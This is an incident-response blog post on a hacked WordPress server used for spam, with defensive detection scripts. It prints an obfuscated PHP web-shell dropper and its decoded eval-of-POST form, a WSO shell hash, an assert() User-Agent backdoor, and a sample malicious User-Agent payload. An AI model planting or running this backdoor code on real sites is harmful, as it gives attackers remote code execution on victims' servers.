Cleaning up a hacked WordPress

April 23, 2013 by Asbra

Recently I received a few spam emails in the “LinkedIn” campaign and analyzed them.

Here is an example:
[Image: sample email from the LinkedIn spam campaign]

The links in the email all lead to the same place:
http:// a hacked website /wp-content/plugins/akicmet/wp-status.php?HEQMB3HVL5URH

I informed a few of the domain holders about the breach and was able to gain access to one server, to help the guy out. Unfortunately I was not able to retrieve a sample of the wp-status.php before the client deleted it. However, I found other things on the server.

Analyzing the access and error logs, it's apparent that someone is, and has been, bruteforcing his WordPress installations, perhaps as part of the WordPress bruteforce attack reported on by Brian Krebs. The client's webhost has mod_rbl installed, which has helped a bit, but not enough.
However this does not seem to be related to the current intrusion.

In /wp-content/ a .php file has been added:

<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

Which decodes to

<?php
if(isset($_POST["code"]))
{
eval(base64_decode($_POST["code"]));
}

This is a basic PHP command dropper (a minimal web shell) that an attacker can use to run arbitrary code on the server remotely, drop more files, and so on. There is no kind of "security" on this script: anyone who knows that it reads the POST variable "code" can run commands on the server.

Looking further, /wp-content/plugins/hello.php has been replaced with a WSO 404 shell. Here is his shell password hash, if anyone is interested (WSO stores the MD5 of the login password in $auth_pass, not the password itself):

$auth_pass = "db45017826a631e563871485b70ed782";

And there's another injection in a few WordPress core files:
[Image: assert() injection in WordPress core files]

PHP's assert() evaluates a string argument as PHP code, much like eval() (in the PHP 5 versions of the time; PHP 8 no longer evaluates string assertions), and here the attacker delivers the payload in the User-Agent header ($_SERVER['HTTP_USER_AGENT']) instead of, for example, a GET or POST parameter, so the backdoor never shows up as a suspicious query string. Note that the combined access-log format still records the User-Agent, so those payloads can be found by grepping the logs for PHP syntax in that field.
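The three artifacts above (the base64/hex-escaped dropper in /wp-content/, the WSO shell's $auth_pass, and the assert() of the User-Agent in core files) are all things a simple scanner can find if it peels the obfuscation layers first. The following is an added example, not the post author's tooling: it embeds the dropper quoted above as its sample input, decodes the hex-escaped identifier and the nested base64 literals, and matches indicator patterns against the raw source, the unescaped source and every decoded layer. The indicator list is an assumption about common variants of what was found, and the wso_auth_pass pattern relies on WSO storing an MD5 hash.

```python
"""Scan a WordPress tree for the kind of obfuscated backdoors found above.

Added example, not the post author's tooling. DROPPER_SAMPLE is the
/wp-content/ dropper quoted in the post; the indicator patterns are assumptions
about common variants of what was found (eval/assert droppers, WSO $auth_pass,
hex-escaped function names, long base64 literals).
"""
import base64
import os
import re

INDICATORS = {
    # eval() fed from a base64 literal or straight from a request variable
    "eval_base64_decode": r"eval\s*\(\s*base64_decode\s*\(",
    "eval_of_request_var": r"eval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\b",
    # the core-file injection: assert() executing the User-Agent header
    "assert_of_user_agent": r"assert\s*\(\s*(?:stripslashes\s*\(\s*)?\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]",
    # WSO web shell: MD5 of the login password
    "wso_auth_pass": r"\$auth_pass\s*=\s*['\"][0-9a-f]{32}['\"]",
    # function name spelled as "\x62\141\x73..." to dodge a plain grep
    "hex_escaped_identifier": r"(?:\\x[0-9a-fA-F]{1,2}|\\[0-7]{1,3}){6,}",
    "long_base64_literal": r"['\"][A-Za-z0-9+/]{40,}={0,2}['\"]",
}

_ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{1,2}|\\[0-7]{1,3}")
_B64_RE = re.compile(r"""['"]([A-Za-z0-9+/]{40,}={0,2})['"]""")

# Sample from the post: the dropper found in /wp-content/ (embedded so this runs offline).
DROPPER_SAMPLE = r'''<?php //cb6f82f3e4007bdaccf419abafab94c8
$_=
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0=';
//system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));
'''


def unescape_php_string(s):
    """Resolve PHP \\xNN and \\NNN escapes so "\\x62\\141..." reads as "base64_decode"."""
    def repl(m):
        tok = m.group(0)
        return chr(int(tok[2:], 16)) if tok[1] == "x" else chr(int(tok[1:], 8))
    return _ESCAPE_RE.sub(repl, s)


def decode_base64_literals(src, depth=3):
    """Decode every long base64 literal; recurse because droppers nest layers."""
    layers = []
    for m in _B64_RE.finditer(src):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8", errors="replace")
        except ValueError:
            continue
        if sum(c.isprintable() or c.isspace() for c in text) < 0.9 * len(text):
            continue  # binary blob (an image, a zip), not code
        layers.append(text)
        if depth > 1:
            layers.extend(decode_base64_literals(text, depth - 1))
    return layers


def analyze(src):
    """Return indicator names, unescaped identifiers and decoded layers for one PHP source."""
    unescaped = [unescape_php_string(m.group(0))
                 for m in re.finditer(INDICATORS["hex_escaped_identifier"], src)]
    layers = decode_base64_literals(src)
    found = set()
    # Match against the raw source, the unescaped source and every decoded layer,
    # so obfuscation of the outer file does not hide what it finally executes.
    for text in [src, unescape_php_string(src)] + layers:
        for name, pattern in INDICATORS.items():
            if re.search(pattern, text):
                found.add(name)
    return {"indicators": sorted(found), "unescaped": unescaped, "decoded": layers}


def scan_tree(root):
    """Walk a webroot and return {path: analysis} for every .php file with a hit."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = analyze(fh.read())
                if result["indicators"]:
                    hits[path] = result
    return hits


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, result in scan_tree(sys.argv[1]).items():
            print(path, result["indicators"], result["unescaped"])
    else:
        print(analyze(DROPPER_SAMPLE))
```

Run it with the webroot as the only argument to list hits; with no argument it analyzes the embedded dropper, for which the outer file only trips the "long base64" and "hex-escaped identifier" patterns, while the decoded layer is what reveals the eval() of $_POST["code"]. The long_base64_literal pattern will flag legitimate files too (embedded images, vendored minified code), so treat it as a prompt to decode and look, not as proof of compromise.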

The server had also been used to send further mail in the spam campaign, and was still mailing when I gained access to the server. As soon as I removed the conf.php file, the mailing stopped.

Analyzing the access logs I found this:

XX.XX.38.113 - - [22/Apr/2013:09:58:54 -0600] "GET /wp-content/plugins/akicmet/wp-status.php?mode=config&key=gfinberw8gjyu9djru47slbn47quf8oytuh7gdrs HTTP/1.1" 200 520 "http:// domain censored /wp-content/plugins/akismet/wp-status.php?mode=config&key=gfinberw8gjyu9djru47slbn47quf8oytuh7gdrs" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24"

The key is the same in all of these requests, and the path to wp-status.php is usually under a plugin directory named akismet or akicmet (a lookalike of the real Akismet plugin directory). From there you can see that the domain for his TDS (traffic distribution system) is currently http://sydinex.net/TDS.post.php, on IP 94.250.251.43.
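The log line above, the User-Agent-borne payloads for the assert() injection, and the wp-login.php bruteforcing are all visible in the same Apache combined access log. The following is an added example, not the post author's tooling, that parses that format and pulls out all three: the first sample line is the one quoted above (censoring kept), the remaining lines are constructed here to exercise each check, and the bruteforce threshold of 20 POSTs is an arbitrary assumption.

```python
"""Pull the three signs of this intrusion out of an Apache combined access log:
requests to the planted wp-status.php (with the campaign key), PHP code arriving
in the User-Agent header for the assert() backdoor, and wp-login.php bruteforcing.

Added example, not the post author's tooling. The first SAMPLE_LOG line is the
one quoted in the post (censoring kept); the rest are constructed here, and the
bruteforce threshold of 20 POSTs is an arbitrary assumption.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# wp-status.php dropped into any plugin directory (akismet / akicmet in the post)
MAILER_RE = re.compile(r"^/wp-content/plugins/[^/]+/wp-status\.php$")
# PHP source in a User-Agent: what the assert() injection in core files executes
PHP_IN_UA_RE = re.compile(
    r"(?:eval|assert|base64_decode|system|passthru|shell_exec)\s*\(|<\?php|\$_(?:GET|POST|SERVER)"
)

SAMPLE_LOG = [
    # from the post
    'XX.XX.38.113 - - [22/Apr/2013:09:58:54 -0600] "GET /wp-content/plugins/akicmet/wp-status.php?mode=config&key=gfinberw8gjyu9djru47slbn47quf8oytuh7gdrs HTTP/1.1" 200 520 "http:// domain censored /wp-content/plugins/akismet/wp-status.php?mode=config&key=gfinberw8gjyu9djru47slbn47quf8oytuh7gdrs" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24"',
    # constructed: payload for the assert() backdoor delivered in the User-Agent
    '203.0.113.7 - - [22/Apr/2013:10:01:12 -0600] "GET /index.php HTTP/1.1" 200 1020 "-" "eval(base64_decode(\'cGhwaW5mbygpOw==\'));"',
    # constructed: an ordinary visitor
    '198.51.100.9 - - [22/Apr/2013:10:02:00 -0600] "GET /about/ HTTP/1.1" 200 8234 "-" "Mozilla/5.0"',
] + [
    # constructed: one IP hammering the login form
    '192.0.2.55 - - [22/Apr/2013:10:03:%02d -0600] "POST /wp-login.php HTTP/1.1" 200 3450 "-" "Mozilla/4.0"' % s
    for s in range(25)
]


def parse_line(line):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def records(lines):
    return [r for r in map(parse_line, lines) if r]


def mailer_hits(lines):
    """(ip, plugin dir, key) for every request to a planted wp-status.php."""
    hits = []
    for rec in records(lines):
        url = urlsplit(rec["path"])
        if MAILER_RE.match(url.path):
            key = parse_qs(url.query).get("key", [""])[0]
            hits.append((rec["ip"], url.path.split("/")[3], key))
    return hits


def php_in_user_agent(lines):
    """(ip, user agent) where the User-Agent looks like PHP code."""
    return [(r["ip"], r["ua"]) for r in records(lines) if PHP_IN_UA_RE.search(r["ua"])]


def login_bruteforce(lines, threshold=20):
    """IPs with at least `threshold` POSTs to wp-login.php, with their counts."""
    counts = Counter(r["ip"] for r in records(lines)
                     if r["method"] == "POST" and urlsplit(r["path"]).path.endswith("/wp-login.php"))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1], errors="replace").read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG
    print("mailer hits:", mailer_hits(lines))
    print("php in user-agent:", php_in_user_agent(lines))
    print("login bruteforce:", login_bruteforce(lines))
```

Pass an access_log path to run it on real data. Only the request path is matched for wp-status.php, not the Referer, so the akismet path in the referer of the quoted line does not double count; the per-IP threshold for wp-login.php will miss distributed bruteforcing, which is why the post's logs showed mod_rbl helping but not enough.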

In conclusion

Easy to clean up, but the damage is already done: his server has been used in spam campaigns for a long time by now (the intrusion seems to date from March 17th).

Protecting your WordPress

I recommended that the client install the Wordfence Security plugin for WordPress. The free version is enough to give you decent protection against bruteforcing (with a bit of tweaking), alerts when files change (important), and basic "hiding" options such as removing the WordPress meta tags.

However, it does not find everything I would like it to, so I usually use it in conjunction with the Exploit Scanner plugin, which checks for common suspicious strings; it certainly gives false positives, but they are sometimes worth checking in on.

Asbra

Blogging out of many years of experience with gamehacking, programming, reverse-engineering and general tomfoolery.
